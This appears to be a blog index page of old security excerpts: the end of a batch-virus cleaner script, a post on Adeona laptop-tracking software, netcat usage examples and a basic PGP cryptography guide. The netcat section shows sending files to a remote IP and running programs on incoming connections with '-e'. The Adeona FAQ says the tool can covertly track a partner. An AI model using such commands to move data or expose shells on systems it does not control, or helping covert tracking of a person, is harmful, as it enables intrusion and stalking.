find "%is%"<%2>nul
if errorlevel 1 goto done
echo Found in %2 - remove?
choice /c:yn>nul
if errorlevel 2 goto done
find /v "%ks%">%2>rem$$_
copy rem$$_ %2>nul
goto done
:exit
set is=
set ks=
:done

This program removes viruses that have a unique key, such as the pot virus and the zep virus, although both these viruses do no harm they still are a threat to your data. The major advantage about this program is that it will abstract the virus from the file so that you do not have to delete the file.

This is for batch file viruses only!! It does not work on COM or EXE files!!

Warning! If key is not unique this will destroy files!

Usage:

CLEANBAT Key1 [Key2]

...where Key1 is the UNIQUE signature used by the virus and Key2 is an identifying string. If not specified then Key2 is set to Key1

eg. to kill the skul virus goto DOS and:

type: clean skul

..and that is it, easy, look in your batch files and see if you have any thing out of the ordinary such as the words infect/vir/a certain date.

Read more >>

Adeona is open source software to system used to securely and privately track the location of your Windows, Mac, or Linux laptop.
What makes Adeona stand out, even from proprietary solutions, is it’s ability to securely transmit the location data preventing 3rd parties from also gathering the information.
Keep in mind that Adeona is still in beta, so don’t expect a perfect program just yet. Please do report any bugs that you might find.
Installation methods differ between operating systems so be sure to read the download instructions.
One interesting question from the FAQs:

Can I install this on my girlfriend or boyfriend’s computer and track her or him, and perhaps get pictures of them while they’re doing certain activites?
Yes. Like all technologies, Adeona has the potential for being abused. However, if you are malicious enough to want to do the above, there is probably other software available out there more suited for your needs. (We won’t provide links to these more malicious tools.)

Adeona seems to be a good solution to give you a piece of mind that if your laptop gets stolen, you might have a chance to retrieve it.
If you have any other suggestions for software to track your stolen laptop, please let us know in the comments as always.

Read more >>

netcat is a really great tool installed on almost all UNIX based systems, even on most windows systems. Here you'll find some examples of what you can do with this great tool.

On UNIX based systems, the tool is usually called netcat, but on some systems it also may be called nc. On Windows, you'll find the nc.exe binary in C:\WINDOWS\system32.

Remember, on UNIX based systems you have to be root in order to listen on sockets with a port number less that 1024.

Spoofing a HTTP Request

Find out which headers your browser would normally send to a web site by pointing your browser to http://localhost:3333 after having set up the listener:

netcat -lp 3333

After that, establish a connection to the website you want to send the spoofed headers to and paste the modified headers:

netcat www.example.com 80

Note that a HTTP request is finished by and empty line, meaning two newlines.

Chatting

You can do some very basic chatting with netcat. To do this, User A has to set up a netcat listener:

netcat -vlp 3333

User B can then connect to this server with the following command, where IP is AA's IP;

netcat IP 3333

As soon as user B has connected A will get a notice and they can start chatting.

Transferring a File

On the destination side a listener which writes anything he receives to a file has to be set up:

netcat -lp 3333 > file

The sender issues the following command, where file is the file he wants to send and IP is the destination IP.

cat file | netcat -w 1 IP 3333

Getting System Information

netcat can also be used to obtain information about a system. The system which is to be monitored just sets up a listener which, whenever another program connects, sends the output of uptime. As soon as netcat terminates (that is, when a connection has been terminated) it'll be restarted:

while `netcat -lp 3333 -e /usr/bin/uptime`;do;done

The user who wants to obtain system information has to issue the following command:

netcat IP 3333

Setting up a (very minimal) webserver

You can set up netcat to act as a very basic webserver which can just serve one file:

while `netcat -lp 8080 -c 'echo HTTP/1.0 200 OK';echo;cat file`;do;done

Doing Local Port Forwards

This command would forward every request on port 8080 to port 80:

while `netcat -lp 8080 -c 'netcat localhost 80'`;do;done

Read more >>

The Basics of Cryptography

by tHe mAnIaC


This guide is for educational purposes only I do not take any responsibility about anything

happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision.

If you want to put this text on your Site/FTP/Newsgroup or anything else you can do it but don't

change anything without the permission of the author.

<--=--=--=--=--=--=--=--=>

A word from the author:


I hope you like my texts and find them useful.

If you have any problem or some suggestion feel free to e-mail me but please don't send mails like

"I want to hack the US government please help me" or "Tell me how to bind a trojan into a .jpg"

Be sure if I can help you with something I will do it.

<--=--=--=--=--=--=--=--=>



Table of Contents



1.What is this text about?

2.About Encryption and how it works

3.About the Cryptography and PGP

4.Ways of breaking the encryption

-Bad pass phrases

-Not deleted files

-Viruses and trojans

-Fake Version of PGP

=--=--=--=--=--=--=--=--=





1.What is this text about?

-=-=-=-=-=-=-=-=-=-=-=-=-=

In this text I'll explain you everything about encryption,what is it,PGP,

ways that someone can read your encrypted files etc.Every hacker or

paranoid should use encryption and keep the other from reading their

files.The encryption is very important thing and I'll explain you how can

someone break and decrypt your files.



2.About Encryption and how it works

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The Encryption is very old.Even Julius Caesar used it when he was

sending messages because he didn't trust to his messengers.You see

encryption is everywhere,when you watch some spy film you see

there's always a computer with encrypted files or some film about hackers

when the feds busted the hacker and they see all of the hacker's files are

encrypted.



When you have simple .txt file that you can read this is called "plain text".

But when you use encryption and encrypt the file it will become unreadable

by the time you don't enter the password.This text is called cipher text.

The process of converting a cipher text into plain text is called decryption.



Here's a little example:



Plain text ==>Encryption==>Ciphertext==>Descryption==>Plaintext



This example shows you the way when you encrypt and decrypt a file.



3.About the Cryptography and PGP

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Cryptography is science that use the mathematics to encrypt and decrypt data.This science

let you keep your files and documents safe even on insecure networks like the Internet.

The cryptography can be weak and strong.The best is of course the strong one.Even when you

use all the computers in the world and they're doing billion operations in second you'll just need

BILLIONS of years to decrypt strong encryption.



PGP (Pretty Good Privacy) is maybe the best encryption program to encrypt your files and documents.

It work in this way:



When you encrypt one file with PGP,PGP first compress the file.This saves you disk space and modem

transmition.Then it creates a session key.This session key works with a very secure and fast

confidential encryption algorithm to encrypt the file.Then the session key is encrypted with the

recipient's public key.

PGP ask you for pass phrase not for password.This is more secure against the dictionary attacks

when someone tries to use all the words in a dictionary to get your password.When you use

pass phrase you can enter a whole phrase with upper and lowercase letters with numeric and

punctuation characters.





4.Ways of breaking the encryption

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

PGP has been written for people that want their files encrypted for people that want privacy.

When you send an e-mail it can be read from other people if you use PGP only the person for who

is the message will be able to read it.





Now you know many things about PGP and the encryption but you may like to know can someone

break it and read your private texts and files.In fact if you use all the computers in the world to

decrypt a simple PGP message they'll need 12 million times the age of the universe to break it.

You see this is the BEST the encryption is so strong noone can break it.

The people that program it has done their work now everything depends on you.



-Bad pass phrases

*****************



The algorithm is unbreakable but they're other ways to decrypt the text and read it.

One of the biggest mistakes when someone writes his/her pass phrase is that the pass phrase is

something like : "John" "I love you" and such lame phrases.Other one are the name of some friend

or something like that.This is not good because this is pass phrase not password make it longer

put numbers and other characters in it.The longer your pass phrase is the harder it will be guessed

but put whole sentences even one that doesn't make sense just think in this way:

Someone is brute-forcing thousands of pass phrases from a dictionary therefore my pass phrase

should be someone that is not there in the dictionary something very stupid like:



hEllowOrld33IjustwanTtoteLLtoev3ryon3thatI'maLamErandI'mahacKer666



This is easy to remember because it's funny and there are only a few numbers but you may not use

upper and lowercase characters.I hope you know will put some very good pass phrase and be sure

noone will know it.



Another mistake is that you may write the pass phase on a paper and if someone find it you'll loose

it and he/she will be able to read your encrypted files.



-Not deleted files

******************



Another big security problem is how most of the operating systems delete files.So when you encrypt

the file you delete the plain text and of course leave the encrypted one.

But the system doesn't actually delete the file.It just mark those blocks of the disk deleted and free.

Someone may run a disk recovery program and still see all the files but in plaintext.Even when you're

writing your text file with a word editor it can create some temporary copies of it.When you close it

these files are deleted but as I told you they're still somewhere on your computer.

PGP has tool called PGP Secure Wipe that complete removes all deleted files from your computer

by overwriting them.In this way you'll only have the encrypted files on your computer.



-Viruses and Trojans

********************



Another dangerous security problem are the viruses and the trojans.So when you infect with a

trojan the attacker may run a key logger on your system.



*Note

A key logger is a program that captures all keystrokes pressed by you then saves them on your

hard drive or send them to the attacker

***************************************

So after the attacker run it he/she will be able to see everything you have written on your computer

and of course with your PGP pass phrase.

There are also a viruses designed to do this.Simpy record your pass phrase and send it back to the

attacker.



-Fake Version of PGP

********************



Another security problem is the PGP source that is

available so someone can make a fake copy of it that is recording your pass phase and

sending it back to the attacker.The program will look real and it will work but it may also have

functions you even don't know about.

A way of defending of these security problems is to use a trojan and a virus scanner.You should

also be sure your computer is clean from viruses and trojans when you install PGP and also be sure

you get PGP from Network Associates Inc. not from some other pages.



So now I hope you understand that PGP can't be braked but if you use it wisely and be sure

your pass phrase is good one,you're not infected with viruses or trojans and you're using the

real version of PGP you'll be secure.

Read more >>